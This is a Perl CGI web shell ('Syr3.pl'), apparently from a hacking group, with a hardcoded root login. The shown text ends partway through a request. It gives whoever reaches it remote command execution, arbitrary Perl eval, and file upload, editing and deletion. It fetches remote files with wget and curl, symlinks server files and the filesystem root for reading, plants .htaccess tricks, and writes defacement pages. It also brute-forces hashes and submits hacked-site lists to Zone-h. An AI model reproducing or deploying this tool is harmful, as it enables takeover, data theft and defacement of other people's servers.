Syr3.pl

1. #!/usr/bin/perl
2. ##############################################
3. # Login info
4. my $Username="root"; #username
5. my $Password="toor"; #password
6. ##############################################
7. #Styl3 : The Shell Color
8. #You Can Change it Like You Want
9. #Like This : #990000| #00FF00 | #FFFFFF | #008000
10. ##############################################
11. our $Color_1="#990000"; # The Main Color
12. our $Color_2="#666"; # The Box Color
13. our $Color_3="#000000"; # The background color
14. our $Color_4="#ffffff"; # The Input Font Color
15. our $Color_5="#333333"; # The textarea Color
16. ##############################################
17. # Cgi Staff ....
18. # Using Cgi Can Help Us With Html Staf
19. # You Can Use GET or POST var like this : '$cgi->param('varname')'
20. use CGI::Pretty qw(:all);
21. our $cgi=new CGI;
22. our (%Cookies,$os,$cmd,$path,$session);
23. Main() ;# Main .....
24. ##############################################
25. #------------- [ Cmd stuff ] ----------------#
26. ##############################################
27. # I Will use `cmd` and system() for make sur
28. # execute the orders
29. if (html_var('action') eq "cmd")
30. {
31. $cmd = html_var('cmd');
32. if (html_var('cmd') eq "")
33. {
34. if ($os eq "Linux")
35. {
36. $cmd="ls -lia";
37. }
38. else
39. {
40. $cmd="dir"
41. }
42. }
43. if (!html_var('help'))
44. {
45. msg_txt(Cmd($cmd));
46. }
47. else
48. {
49. ###################
50. # cmd Help
51. &text_start;
52. if ($os eq "Linux")
53. {
54. print<<END;
55. |------------------------------|-----------------------------------------------|---------------------------------------------|
56. | Command | Example | Comment |
57. |------------------------------|-----------------------------------------------|---------------------------------------------|
58. | zip | zip FileName | Compress the Files Into a ZIP Archive |
59. | unzip | unzip FileName | Extract the ZIP Archives |
60. | tar -zcf | tar -zcf zz.tar daily | Compress the Files Into a TAR Archive |
61. | tar -zxf | tar -zxf zz.tar | Extract the TAR Archives |
62. | tar -czvf | tar -czvf FileName.tar.gz FileName | Compress the Files Into a GZ Archive |
63. | gzip -d | gzip -d FileName.gz | Extract the GZ Archives |
64. | tar -czvf | tar -czvf FileName.tar.gz database | Compress the Files Into SQL Archive |
65. | tar -zxvf | tar -zxvf FileName.tar.gz | Extract the Database Files SQL |
66. | tar -czvf | tar -czvf FileName.tar.gz NewFile | Compress the Folders Into a tar.gz Archive |
67. | ls | ls /home | View the files name in the directory |
68. | ls -la | ls -la /home | View Files And Folders in hidden files |
69. | pwd | pwd | Show the Current Path |
70. | ; | ls;pwd | Combine the Commands |
71. | wget | wget http://site.com/file.zip | Get file from URL Using Wget Command |
72. | curl -o | curl -o http://site.com/file.zip | Get file from URL Using curl -o Command |
73. | lynx -source | lynx -source http://site.com/file.zip| Get file from URL Using lynx -source Command|
74. | get | get http://site.com/file.zip | Get file from URL Using get Command |
75. | history | history | Show All Previous Commands that you Executed|
76. | mkdir | mkdir /myNewDir | make a new Directory in the server |
77. | rm | rm file | Deleting Files |
78. | rm -r | rm -r myDirectory | Deleting Directory and it's Files |
79. | edit | edit myFile | Edit a file using text editer |
80. | who | who | who's Connected to the server |
81. | cd | cd /home/user | Enter the Selected Path |
82. | cd ../ | cd ../ | Go To Upper Directory |
83. | mv | mv myFile1 /home/myFile2 | Move And Rename The File |
84. | find | find myFile | Looking for a file or folder |
85. | ./ | ./localroot | Execute the Executable file |
86. | sh | sh localroot | Execute the shell Programming Code |
87. | uname -a | uname -a | View The Server Kernel Information |
88. | * | rm * | Execute the Command for all |
89. | man | man ls | Help About ls Command |
90. | touch | touch myFile | Create A new File |
91. | gcc | gcc myFile1 -o myFile2 | Convert to Binary Executable File |
92. | cat | cat myFile | Read the File contents |
93. | more | more myFile | Read the File easily if it's larg |
94. | pico | pico myFile | Edit File Using Pico Text Editer |
95. | perl | Perl myFile.pl | Execute the Perl Scripts |
96. | ln | ln -s /home/myFile myLink | Make a link to the file |
97. | grep | grep myFile myText | Look for the Text in the File |
98. | chmod | chmod 755 myDirectory | Change the permission to Files Or Folders |
99. | chown | chown root myFile | Change the File Owner |
100. | chgrp | chgrp root myFile | Change The File Group |
101. | clear | clear | Clear the Screen |
102. | cmp | cmp myFile1 myFile2 | Compare the Tow Files |
103. | crypt | crypt myFile | To Encrypt myFile |
104. | csplit | csplit myFile | Spread the File Into pieces |
105. |------------------------------|-----------------------------------------------|---------------------------------------------|
106. END
107. }
108. else
109. {
110. print<<END;
111. |------------------------------|-----------------------------------------------|---------------------------------------------|
112. | Command | Example | Comment |
113. |------------------------------|-----------------------------------------------|---------------------------------------------|
114. | cd | cd c:/ | Enter the Selected Path |
115. | mkdir | mkdir c:/myNewDir | make a new Directory in the server |
116. | ver | ver | View The Server version Information |
117. | whoami | whoami | get user name and group information |
118. | DATE | DATE | Displays or sets the date |
119. | DEL | DEL file.txt | Deletes one or more files |
120. | DIR | DIR | Displays a list of files and subdirectories |
121. | FIND | FIND "user" | Searches for a text string in a file |
122. | FORMAT | FORMAT c | Formats a disk |
123. | HELP | HELP | Provides Help information |
124. | MD | MD foldername | Creates a directory |
125. | PRINT | PRINT txt.txt | Prints a text file |
126. | RENAME | RENAME txt.txt file.txt | Renames a file or files |
127. | RMDIR | RMDIR dir | Removes a directory |
128. |------------------------------|-----------------------------------------------|---------------------------------------------|
129. END
130. }
131. }
132. &text_end;
133. }
134. ##############################################
135. #------------ [ Upload File ] ---------------#
136. ##############################################
137. if (html_var('action') eq "upload")
138. {
139. &text_start;
140. if ($cgi->param('fileme'))
141. {
142. print "[+] Uploading File ....".$cgi->param('fileme');
143. if (writable($path) eq 1)
144. {
145. my $filename = $cgi->param("fileme");
146. my $upload_filehandle = $cgi->upload("fileme");
147. open ( UPLOADFILE, ">$filename" ) or print "$!";
148. binmode UPLOADFILE;
149. while ( <$upload_filehandle> )
150. {
151. print UPLOADFILE;
152. }
153. close UPLOADFILE;
154. if (-e $filename)
155. {
156. print " Upload Succses";
157. }
158. else
159. {
160. print " Error ...";
161. }
162. }
163. else
164. {
165. print "[-] The Folder ".$path." is Not writable";
166. }
167. }
168. else
169. {
170. print "[-] Error ...Pleas Select A File To Upload \n";
171. }
172. &text_end;
173. }
174. ##############################################
175. #-------------- [ File Get ] ----------------#
176. ##############################################
177. # This Work on Linux only :)
178. if (html_var('action') eq "fileget")
179. {
180. my $write =writable($path);
181. if ($write eq 1)
182. {
183. my $get_type=html_var('getType');
184. my $url_ =html_var('fileUrl');
185. if ($os eq "Linux")
186. {
187. Cmd("$get_type $url_");
188. # Get's File Name
189. msg_txt("[+] Getting File :$get_type $file ....$RE...\n");
190. }
191. else
192. {
193. dont_work();
194. }
195. }
196. else
197. {
198. msg_txt("[-] The Folder ".$path." is Not writable");
199. }
200. }
201. ##############################################
202. #------------ [ Rename File ] ---------------#
203. ##############################################
204. if (html_var('action') eq "RenameFile")
205. {
206. &text_start;
207. rename(html_var('RenameFile_a'),html_var('RenameFile_b')) or my $err =1 ;
208. if ($err eq 1)
209. {
210. print "[-] Error...$!\n";
211. }
212. else
213. {
214. print "[+] The File Was Renamed ....Ok\n";
215. }
216. &text_end;
217. }
218. ##############################################
219. #------------ [ Delete File ] ---------------#
220. ##############################################
221. if (html_var('action') eq "deletefile")
222. {
223. &text_start;
224.  
225. if (html_var('type') eq "file")
226. {
227. unlink(html_var('delete_file')) or $err=1;
228. if ($err eq 1)
229. {
230. print "[-] Error ....$!\n";
231. }
232. else
233. {
234. if (-e html_var('delete_file'))
235. {
236. print "[+] I Can't Delete That File";
237. }
238. else
239. {
240. print "[+] The File Was Deleted ....Ok";
241. }
242. }
243. }
244. else
245. {
246. ##############################################
247. #----------- [ Delete Folder ] --------------#
248. ##############################################
249. rmdir(html_var('delete_file')) or $err=1;
250. if ($err eq 1)
251. {
252. print "[-] I Can't Delete Your Folder (",html_var('delete_file'),") $!";
253. }
254. else
255. {
256. if (-e html_var('delete_file'))
257. {
258. print "[-] I Can't Delete Folder (",html_var('delete_file'),")";
259. }
260. else
261. {
262. print "[+] The Folder (",html_var('delete_file'),") is Deleted ....Ok";
263. }
264. }
265. }
266. &text_end;
267. }
268. ##############################################
269. #------------- [ Edite file ] ---------------#
270. ##############################################
271. if (html_var('action') eq "edit")
272. {
273. if (html_var('save'))
274. {
275. $filename=html_var('file_path');
276. $txt = html_var('file_con');
277. $txt = HtmlSpecialChars_rev($txt);
278. open (myfile,">$filename");
279. print myfile $txt ;
280. close (myfile);
281. msg_txt("[+] Ok ...File Was Edited");
282. }
283. else
284. {
285. open (WRD, html_var('filee')) or $err=1 ;
286. if ($err ne 1)
287. {
288. print '<form name="edite_form" method="POST" action="?id=home" onSubmit="encode(edite_form.file_con);">
289. <p align="center">
290. <textarea rows="24" name="file_con">';
291. while (<WRD>)
292. {
293. ($word) = split (/,/);
294. print HtmlSpecialChars($word);
295. }
296. close (WRD);
297. $s=html_var('filee');
298. $s=encode_base64($s);
299. print "
300. </textarea><br><input type=\"hidden\" name=\"file_path\" value=\"$s\"><input type=\"hidden\" name=\"action\" value=\"ZWRpdA==\">
301. <input type='submit' name='save' value='Save'></form>
302. ";
303. }
304. else
305. {
306. msg_txt("[-] File not found ". html_var('filee'). "\n");
307. }
308. }
309. }
310. ##############################################
311. #------------- [ Copy File ] ----------------#
312. ##############################################
313. if (html_var('action') eq "copy")
314. {
315. &text_start;
316. use File::Copy;
317. copy(html_var('copy_a'),html_var('copy_b')) or my $err=1;
318. if ($err eq 1)
319. {
320. print "[-] Copy File Was failed: $!\n"
321. }
322. else
323. {
324. if (-e html_var('copy_b'))
325. {
326. print "[+] The File was copied \n";
327. }
328. else
329. {
330. print "[-] Error The File Was not copied \n";
331. }
332. }
333. &text_end;
334. }
335. ##############################################
336. #------------ [ Create Folder ] -------------#
337. ##############################################
338. if (html_var('action') eq "mkdir")
339. {
340. my $write =writable($path);
341. if ($write eq 1)
342. {
343. mkdir(html_var('foldername'));
344. if (-e html_var('foldername'))
345. {
346. msg_txt("[+] Create Folder (".html_var('foldername').") ....Ok");
347. }
348. else
349. {
350. msg_txt("[-] Errot Can't Create Folder (".html_var('foldername').")");
351. }
352. }
353. else
354. {
355. msg_txt("[-] The Folder ".$path." is Not writable");
356. }
357. }
358. ##############################################
359. #---------------- [ unZiP ] -----------------#
360. ##############################################
361. if (html_var('action') eq "unzip")
362. {
363. my $write =writable($path);
364. if ($write eq 1)
365. {
366. if ($os eq "Linux")
367. {
368. my $unzipname=html_var('unzipname');
369. my $txt_cm=Cmd("unzip $unzipname");
370. msg_txt("[+] Unzip zipfile ($unzipname) ....Ok\n $txt_cm");
371. }
372. else
373. {
374. dont_work();
375. }
376. }
377. else
378. {
379. msg_txt("[-] The Folder ".$path." is Not writable");
380. }
381. }
382. ##############################################
383. #----------- [ Users & Domains ] ------------#
384. ##############################################
385. if (html_var('action') eq "user_domin")
386. {
387. if ($os eq "Linux")
388. {
389. &text_start;
390. open (d0mains, '/etc/named.conf') or my $err=1;
391. my @kr = <d0mains>;
392. close d0mains;
393. if ($err)
394. {
395. print ('C0uldn\'t GET it , Sorry');
396. }
397. else
398. {
399. print 'Here is All Domains &amp; Users :';}
400. foreach my $one (@kr)
401. {
402. if($one =~ m/.*?zone "(.*?)" {/)
403. {
404. my $filename= "/etc/valiases/".$1;
405. my $owner = getpwuid((stat($filename))[4]);
406. print ''.$1.' : '.$owner.'';
407. }
408. }
409. }
410. else
411. {
412. dont_work();
413. }
414. }
415. ##############################################
416. #------------- [ Read file ] ----------------#
417. ##############################################
418. my $File=html_var('read');
419. if (html_var('action') eq "read")
420. {
421. if (html_var('type') eq "perl")
422. {
423. &text_start;
424. open (WRD, $File) or print "[-] File not found ", $File, "\n" ;
425. while (<WRD>)
426. {
427. my ($word) = split (/,/);
428. print HtmlSpecialChars($word);
429. }
430. close (WRD);
431. &text_end;
432. }
433. else
434. {
435. ##############################################
436. #-------------- [ symlink ] -----------------#
437. ##############################################
438. #note: this dont work on windows :(
439. &text_start;
440. if ($os eq "Linux")
441. {
442. print "[+] Symlink file ($File)...Ok File Path is : $path/LaZ0rd.txt";
443. symlink ("$File","LaZ0rd.txt");
444. }
445. else
446. {
447. print "[-] I am sorry But symlink dont Work on windows";
448. }
449. &text_end;
450. }
451. }
452. ##############################################
453. #----------- [ Server Shortcut ]-------------#
454. ##############################################
455. if (html_var('action') eq "genServ")
456. {
457. my $write =writable($path);
458. if ($write eq 1)
459. {
460. if ($os eq "Linux")
461. {
462. my $filename=html_var('tool');
463. my $txt_cm=Cmd("ln -s / $filename");
464. if (-e $filename)
465. {
466. msg_txt("[+] Creating Server Shortcut ....Ok\n");
467. }
468. else
469. {
470. msg_txt("[-] Creating Server Shortcut ....Error\n");
471. }
472. }
473. else
474. {
475. dont_work();
476. }
477. }
478. else
479. {
480. msg_txt("[-] The Folder ".$path." is Not writable");
481. }
482. }
483. ##############################################
484. #------------- [ Finde 777 ] ---------------#
485. ##############################################
486. if (html_var('action') eq "777")
487. {
488. if ($os eq "Linux")
489. {
490. &text_start;
491. use File::Find;
492. my ($mode,$find);
493. find (\&wanted, html_var('folder_f'));
494. sub wanted
495. {
496. if ( -d $File::Find::name )
497. {
498. $mode = (stat($File::Find::name))[2];
499. $mode = sprintf "%04o", $mode & 07777;
500. if ($mode == 777)
501. {
502. print "[+] This Folder mode Is $mode : $File::Find::name \n" ;
503. $find=1;
504. }
505. }
506. }
507. if ($find ne 1)
508. {
509. print "I Could not Find 777 Folder In ",html_var('folder_f');
510. }
511. &text_end;
512. }
513. else
514. {
515. dont_work();
516. }
517. }
518. ##############################################
519. #-------------- [ Chmod File ] --------------#
520. ##############################################
521. if (html_var('action') eq "chmod")
522. {
523. if ($os eq "Linux")
524. {
525. my $file=html_var('file');
526. chmod(html_var('nu'),html_var('file'));
527. msg_txt("[+] chomd file ($file) ....Ok\n");
528. }
529. else
530. {
531. dont_work();
532. }
533. }
534. ##############################################
535. #------------- [ Forbidden ] ---------------#
536. ##############################################
537. if (html_var('action') eq "for")
538. {
539. &text_start;
540. my $filename=".htaccess";
541. my $hta =html_var('403');
542. my $htaccess;
543. if ($hta eq "DirectoryIndex")
544. {
545. $htaccess="DirectoryIndex LaZ0rD.txt";
546. }
547. elsif ($hta eq "HeaderName")
548. {
549. $htaccess=" HeaderName LaZ0rD.txt";
550. }
551. elsif ($hta eq "TXT")
552. {
553. $htaccess=" Options Indexes FollowSymLinks
554. addType txt .php
555. AddHandler txt .php";
556. }
557. elsif ($hta eq "404")
558. {
559. $htaccess=" ErrorDocument 404 /404.html
560. 404.html = Symlinked LaZ0rD.txt";
561. }
562. elsif ($hta eq "ReadmeName")
563. {
564. $htaccess="ReadmeName LaZ0rD.txt";
565. }
566. elsif ($hta eq "footerName")
567. {
568. $htaccess="footerName LaZ0rD.txt";
569. }
570. my $write =writable($path);
571. if ($write eq 1)
572. {
573. open (myfile,">>$filename");
574. print myfile $htaccess;
575. close (myfile);
576. if (-e $filename)
577. {
578. print "[+] Creating htaccess File ....Ok\n";
579. print "[+] Now You Can Symlink Your File Use 'LaZ0rD.txt' As File Name\n";
580. }
581. else
582. {
583. print "[-] Creating htaccess File ....Error\n[-]sorry 0_o";
584. }
585. }
586. else
587. {
588. msg_txt("[-] The Folder ".$path." is Not writable");
589. }
590. &text_end;
591. }
592. ##############################################
593. #------------- [ Eval Code ] ---------------#
594. ##############################################
595. if (html_var('action') eq "eval")
596. {
597. &text_start;
598. eval(html_var('stringtool'));# execute The Perl Code
599. &text_end;
600. }
601. ##############################################
602. #--------------- [ encrypt ]-----------------#
603. ##############################################
604. if (html_var('action') eq "enc")
605. {
606. &text_start;
607. my $text_enc=html_var('stringtool');
608. use Digest;
609. my $digest;
610. my $md5 = Digest->new("MD5");
611. my $sha1 = Digest->new("SHA-1");
612. my $sha256 = Digest->new("SHA-256");
613. my $sha384 = Digest->new("SHA-384");
614. my $sha512 = Digest->new("SHA-512");
615. # md5
616. print "[+] Md5 :";
617. my $md_5=$md5->add($text_enc);
618. print $digest = $md_5->hexdigest;
619. print "\n";
620. #sha1
621. print "[+] Sha1 :";
622. my $sha_1=$sha1->add($text_enc);
623. print $digest = $sha_1->hexdigest;
624. print "\n";
625. #sha256
626. print "[+] Sha256 :";
627. my $sha_256=$sha256->add($text_enc);
628. print $digest = $sha_256->hexdigest;
629. print "\n";
630. #sha384
631. print "[+] Sha384 :";
632. my $sha_384=$sha384->add($text_enc);
633. print $digest = $sha_384->hexdigest;
634. print "\n";
635. #sha384
636. print "[+] Sha512 :";
637. my $sha_512=$sha512->add($text_enc);
638. print $digest = $sha_512->hexdigest;
639. print "\n";
640. #Base64
641. print "[+] Base64 :";
642. use MIME::Base64;
643. print my $Base64 = encode_base64($text_enc);
644. #hex
645. print "[+] hex :";
646. my $myString=$text_enc;
647. my @myArray=unpack('C*', $myString);
648. my $myStringHex = '';
649. foreach my $c (@myArray)
650. {
651. $myStringHex .= "" . sprintf ("%lx", $c);
652. }
653. print "0x",$myStringHex;
654. print "\n";
655. # length
656. print "[+] length :";
657. print length($text_enc);
658. print "\n";
659. &text_end;
660. }
661. ##############################################
662. #--------------- [ analyze ]-----------------#
663. ##############################################
664. if (html_var('action') eq "analyze")
665. {
666. &text_start;
667. my $hash=html_var('stringtool');
668. if (substr($hash,0,3) eq '$H$')
669. {
670. print "[+] This Hash : ".$hash." could be MD5(Wordpress) Hash\n";
671. }
672. elsif(substr($hash,0,3) eq '$1$')
673. {
674. print "[+] This Hash : ".$hash." could be MD5(UNIX) Hash\n";
675. }
676. elsif(substr($hash,0,3) eq '$P$')
677. {
678. print "[+] This Hash : ".$hash." could be MD5(Wordpress) Hash\n";
679. }
680. elsif(substr($hash,0,6) eq '$apr1$')
681. {
682. print "[+] This Hash : ".$hash." could be MD5(ARP) Hash\n";
683. }
684. elsif(substr($hash,0,3) eq '$5$')
685. {
686. print "[+] This Hash : ".$hash." could be SHA256(UNIX) Hash\n";
687. }
688. elsif(substr($hash,0,3) eq '$6$')
689. {
690. print "[+] This Hash : ".$hash." could be SHA512(UNIX) Hash\n";
691. }
692. elsif(substr($hash,0,1) eq '*' and length($hash) eq 41)
693. {
694. print "[+] This Hash : ".$hash." could be MySQL V5.3.x Hash\n";
695. }
696. elsif (length($hash) eq 32 and ishex($hash))
697. {
698. print "[+] This Hash : ".$hash." could be MD5 Hash\n";
699. print "[+] This Hash : ".$hash." could be MD4 Hash\n";
700. print "[+] This Hash : ".$hash." could be MD2 Hash\n";
701. print "[+] This Hash : ".$hash." could be eMule Hash\n";
702. }
703. elsif (length($hash) eq 4 and ishex($hash))
704. {
705. print "[+] This Hash : ".$hash." could be CRC-16 Hash\n";
706. print "[+] This Hash : ".$hash." could be CRC-16-CCITT Hash\n";
707. print "[+] This Hash : ".$hash." could be FCS-16 Hash\n";
708. }
709. elsif(length($hash) eq 13)
710. {
711. print "[+] This Hash : ".$hash." could be DES Hash\n";
712. }
713. elsif (length($hash) eq 16 and ishex($hash))
714. {
715. print "[+] This Hash : ".$hash." could be MYSQL Hash\n";
716. }
717. elsif(length($hash) eq 40 and ishex($hash))
718. {
719. print "[+] This Hash : ".$hash." could be MYSQL5 Hash\n";
720. print "[+] This Hash : ".$hash." could be SHA0 Hash\n";
721. print "[+] This Hash : ".$hash." could be SHA1 Hash\n";
722. }
723. elsif(length($hash) eq 56)
724. {
725. print "[+] This Hash : ".$hash." could be SHA224 Hash\n";
726. }
727. elsif(length($hash) eq 64)
728. {
729. print "[+] This Hash : ".$hash." could be SHA256 Hash\n";
730. }
731. elsif(length($hash) eq 96)
732. {
733. print "[+] This Hash : ".$hash." could be SHA384 Hash\n";
734. }
735. elsif(length($hash) eq 128)
736. {
737. print "[+] This Hash : ".$hash." could be SHA512 Hash\n";
738. }
739. else
740. {
741. print "[-] I Am sorry But I Don't Know This $hash\n";
742. }
743. &text_end;
744. }
745. ##############################################
746. #------------ [ Download File]---------------#
747. ##############################################
748. sub download
749. {
750. my $SendFile=shift;
751. if(open(SENDFILE, $SendFile)) # file opened for reading
752. {
753. $FileSize = (stat($SendFile))[7];
754. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
755. print "Content-Type: application/x-unknown\n";
756. print "Content-Length: $FileSize\n";
757. print "Content-Disposition: attachment; filename=$1\n\n";
758. print while(<SENDFILE>);
759. close(SENDFILE);
760. exit();
761. }
762. else
763. {
764. print "Content-Type: text/html\n\n";
765. style();
766. java_code();
767. msg_txt("[-] Error....I Can't Find file $SendFile");
768. }
769. }
770. ##############################################
771. #----------- [ Fast Defacement ] -----------#
772. ##############################################
773. if (html_var('action') eq "mass")
774. {
775. my $massFileName=html_var('massFileName');
776. my $write =writable($path);
777. if ($write eq 1)
778. {
779. open (myfile,">>$massFileName");
780. print myfile html_var('massIndex');
781. close (myfile);
782. if (-e html_var('massFileName'))
783. {
784. msg_txt("[+] Creating $massFileName ....Ok\n");
785. }
786. else
787. {
788. msg_txt("[-] Creating $massFileName ....Error\n[-] sorry 0_o");
789. }
790. }
791. else
792. {
793. msg_txt("[-] The Folder ".$path." is Not writable");
794. }
795. }
796. ###########################################################
797. ###########################################################
798. ###------------------ [ Brut3-F0rc3 ] ------------------###
799. ###########################################################
800. ###########################################################
801. use Digest;
802. use Digest::MD5 qw(md5_hex);
803. use Digest::SHA1 qw(sha1_hex);
804. my ($alpha,$exit,$t,$CharSet,$no,@RawString,$cnt,$ret,$hash,$exi,$file,$be,$mincount,$maxcount,$file_,$s);
805. if ($cgi->param('action') eq "Brute-Force")
806. {
807. # Hashz Brut3-F0rc3 CraCker
808. &text_start;
809. print "###########################################################\n";
810. print "###########################################################\n";
811. print "###----------- [ Hashz Brut3-F0rc3 CraCker ] -----------###\n";
812. print "###########################################################\n";
813. print "###########################################################\n";
814. print "[+] Welcame To Hashz Brut3-F0rc3 CraCker... For Hash'z G33k'z 0nly\n";
815. print "[+] C0ded By LaZ0rD SyR!an .... \n";
816. my $user_hash = $cgi->param('hash');
817. my $be = $cgi->param('char');
818. my $mincount = $cgi->param('mincount');
819. my $maxcount = $cgi->param('maxcount');
820. my $type = $cgi->param('type');
821. if ($type eq "How To Use")
822. {
823. print "[?] You Can Crack any [MD5 ,SHA1,SHA-256,SHA-384]\n";
824. print "[?] Your Hash : Your Hash it must be Valid hash \n";
825. print "[?] The Chars : It Can Be [aAdx] \n";
826. print " a = {'a','b','c',...}\n";
827. print " A = {'A','B','C',...}\n";
828. print " d = {'1','2','3',...}\n";
829. print " x = {'!','\','*',...}\n";
830. print "[?] Mini count and Max count is the length Which You Want to Search In :) \n";
831. &text_end;
832. $exit=1;
833. }
834. #############
835. # Chars Staff
836. if ($be=~"a")
837. {
838. $alpha = "abcdefghijklmnopqrstuvwxyz";
839. }
840. if ($be=~"A")
841. {
842. $alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
843. }
844. if ($be=~"d")
845. {
846. $alpha = $alpha."1234567890";
847. }
848. if ($be=~"x")
849. {
850. $alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";
851. }
852. if ($exit ne 1)
853. {
854. print "[+] Using Chars : '",$alpha,"'\n";
855. }
856. #############
857. # Hash Check
858. if ($type eq "MD5")
859. {
860. if (length($user_hash) != 32 and $exit ne 1)
861. {
862. print "[-] Sorry but it seems that the MD5 hash is not valid!\n";
863. &text_end;
864. $exit=1;
865. }
866. else
867. {
868. print "[+] Checking your hash : ok ....it's Valid Md5 Hash\n";
869. }
870. }
871. elsif($type eq "SHA1")
872. {
873. if (length($user_hash) != 40 and $exit ne 1)
874. {
875. print "[-] Sorry but it seems that the SHA1 hash is not valid!\n";
876. &text_end;
877. $exit=1;
878. }
879. else
880. {
881. print "[+] Checking your hash : ok ....it's Valid SHA1 Hash\n";
882. }
883. }
884. elsif ($type eq "SHA-256")
885. {
886. if (length($user_hash) != 64 and $exit ne 1)
887. {
888. print "[-] Sorry but it seems that the SHA-256 hash is not valid!\n";
889. &text_end;
890. $exit=1;
891. }
892. else
893. {
894. print "[+] Checking your hash : ok ....it's Valid SHA-256 Hash\n";
895. }
896. }
897. elsif ($type eq "SHA-384")
898. {
899. if (length($user_hash) != 96 and $exit ne 1)
900. {
901. print "[-] Sorry but it seems that the SHA-384 hash is not valid!\n";
902. &text_end;
903. $exit=1;
904. }
905. else
906. {
907. print "[+] Checking your hash : ok ....it's Valid SHA-384 Hash\n";
908. }
909. }
910. else
911. {
912. if ($exit ne 1)
913. {
914. print "[-] Sorrt But I can't Use : $type ... because I don't know What it's :( \n";
915. &text_end;
916. $exit=1;
917. }
918. }
919. if ($exit ne 1)
920. {
921. print "[+] Using Hash type : $type\n";
922. print "[+] Cracking : $user_hash\n";
923. }
924. #############
925. # The Number Of Chars == (length)
926. if ($exit ne 1)
927. {
928. for ($t=$mincount;$t<=$maxcount;$t++)
929. {
930. Crack ($t);
931. }
932. }
933. #############
934. sub Crack{
935. $CharSet = $_[0];
936. $no=$_[1];
937. @RawString = ();
938. for (my $i =0;$i<$CharSet;$i++)
939. {
940. $RawString[$i] = 0;
941. }
942. do
943. {
944. for (my $i =0;$i<$CharSet;$i++)
945. {
946.  
947. if ($RawString[$i] > length($alpha)-1)
948. {
949. if ($i==$CharSet-1)
950. {
951. $cnt=0;
952. return "false";
953. }
954. $RawString[$i+1]++;
955. $RawString[$i]=0;
956. }
957. }
958. $ret = "";
959. for (my $i =0;$i<$CharSet;$i++)
960. {
961. $ret = $ret . substr($alpha,$RawString[$i],1);
962. }
963. #############
964. $hash = _hash($ret);
965. $cnt++;
966. if ($user_hash eq $hash)
967. {
968. print "[+] I Have tried '$cnt' Possibility \n####################### [ Password Cracked ] =[ $ret ] #######################\n";
969. &text_end;
970. $exi = 1;
971. return 0;
972. }
973. $RawString[0]++;
974. }while($RawString[$CharSet-1]<length($alpha) or $exi = 1);
975. }
976. ##########################################################
977. sub _hash
978. {
979. if ($type eq "MD5")
980. {
981. return md5_hex($_[0]);
982. }
983.  
984. if ($type eq "SHA1")
985. {
986. return sha1_hex($_[0]);
987. }
988.  
989. if ($type eq "SHA-256")
990. {
991. my $sha256 = Digest->new("SHA-256");
992. my $sha_256=$sha256->add($_[0]);
993. my $digest = $sha_256->hexdigest;
994. return $digest;
995. }
996. if ($type eq "SHA-384")
997. {
998. my $SHA384 = Digest->new("SHA-384");
999. my $sha_384=$SHA384->add($_[0]);
1000. my $digest = $sha_384->hexdigest;
1001. return $digest;
1002. }
1003. }
1004. }
1005. ##########################################################
1006. # Wordz List Creator
1007. if ($cgi->param('action') eq "word")
1008. {
1009. &text_start;
1010. print "###########################################################\n";
1011. print "###########################################################\n";
1012. print "###-------------- [ Wordz List Creator ] ---------------###\n";
1013. print "###########################################################\n";
1014. print "###########################################################\n";
1015. print "[+] Welcame To Wordz List Creator...\n";
1016. print "[+] C0ded By LaZ0rD SyR!an .... \n";
1017. $file=$cgi->param('file');
1018. $be = $cgi->param('char');
1019. $mincount = $cgi->param('mincount');
1020. $maxcount = $cgi->param('maxcount');
1021. $file_=open (myfile,">>$file");
1022. ##########################################################
1023. # Chars Staff
1024. if ($be=~"a")
1025. {
1026. $alpha = "abcdefghijklmnopqrstuvwxyz";
1027. }
1028. if ($be=~"A")
1029. {
1030. $alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
1031. }
1032. if ($be=~"d")
1033. {
1034. $alpha = $alpha."1234567890";
1035. }
1036. if ($be=~"x")
1037. {
1038. $alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";
1039. }
1040. print "[+] Using Chars : '",$alpha,"'\n";
1041. ##########################################################
1042. # The Number Of Chars == (length)
1043. for ($t=$mincount;$t<=$maxcount;$t++)
1044. {
1045. $s = generate ($t);
1046. $no = $no + $s;
1047. }
1048. ##########################################################
1049. sub generate{
1050. $CharSet = shift;
1051. @RawString = ();
1052. for (my $i =0;$i<$CharSet;$i++)
1053. {
1054. $RawString[$i] = 0;
1055. }
1056. do
1057. {
1058. for (my $i =0;$i<$CharSet;$i++)
1059. {
1060.  
1061. if ($RawString[$i] > length($alpha)-1)
1062. {
1063. if ($i==$CharSet-1)
1064. {
1065. $cnt=0;
1066. return "false";
1067. }
1068. $RawString[$i+1]++;
1069. $RawString[$i]=0;
1070. }
1071. }
1072. $ret = "";
1073. for (my $i =0;$i<$CharSet;$i++)
1074. {
1075. $ret = $ret . substr($alpha,$RawString[$i],1);
1076. }
1077. $hash = $ret;
1078. $cnt++;
1079. $no++;
1080. print myfile $ret,"\n" ;
1081. $RawString[0]++;
1082. }while($RawString[$CharSet-1]<length($alpha));
1083. return $no;
1084. }
1085. print "[+] I Am Done The File ($file) Has been Created ... With ($no) Possibility :)";
1086. &text_end;
1087. close (myfile);
1088. }
1089. ##############################################
1090. #----------- [ Zone-h sender ] -----------#
1091. ##############################################
1092. if (html_var('action') eq "zone-h")
1093. {
1094. $hacker = html_var('hacker');
1095. if (html_var('list') eq "")
1096. {
1097. print "Enter Your Hacked WebSites List (HaCked By $hacker): ";
1098. print <<END;
1099. <form name="list" method="POST" action= "?id=home" onSubmit="encode(list.hacker);">
1100. <input type="hidden" name="action" value="em9uZS1o">
1101. <input type="hidden" name="hacker" value="$hacker">
1102. <p align="center">
1103. <textarea rows="24" name="list"></textarea>
1104. <input type='submit' value='Sende'>
1105. </form>
1106. END
1107. }else{
1108. text_start();
1109. $sit = $cgi->param('list');
1110. @site = split(/\n/,$sit);
1111. $b = scalar(@site);
1112. $a = 0 ;
1113. while ($a ne $b)
1114. {
1115. #$site[$a]=chomp ($site[$a]);
1116. if($site[$a] =~ /http/) { substr($site[$a], 0, 7) =""; }
1117. print "[+] Postalandi $site[$a]";
1118. use IO::Socket::INET;
1119. $sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or print "Filed ....I Can't Access To WWW.Zone-H.Com";
1120. print $sock "POST /component/option,com_notify/Itemid,89/task,single/ HTTP/1.0\r\n";
